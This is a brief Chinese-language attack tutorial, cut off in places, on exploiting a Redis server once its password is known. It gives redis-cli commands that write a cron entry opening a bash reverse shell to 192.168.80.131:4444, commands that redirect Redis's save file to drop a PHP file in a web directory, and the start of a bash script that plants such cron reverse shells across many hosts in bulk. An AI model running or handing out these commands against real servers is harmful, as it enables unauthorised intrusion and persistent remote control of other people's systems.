redis写入文件 计划任务反弹shell 当知道了目标的redis密码之后,便可以使用未授权的方法在其服务器上写入文件,比如一句话木马,计划任务反弹 shell 等等,进行进一步的渗透。 首先,连接上目标的redis数据库 写入反弹指令 set fantan "\n\n* * * * * bash -i >& /dev/tcp/192.168.80.131/4444 0>&1\n\n" 1...
config set dbfilename redis.php set shell "<?php phpinfo(); ?>" save 1. 2. 3. 4. Shell脚本批量反弹 条件: 客户端上装了redis-cli #!/bin/bash getshell(){ echo "---分割线---" redis-cli -h $i 2>&1 <<eeooff config get dir config set dir /var/spool/cron set x "\n* * ...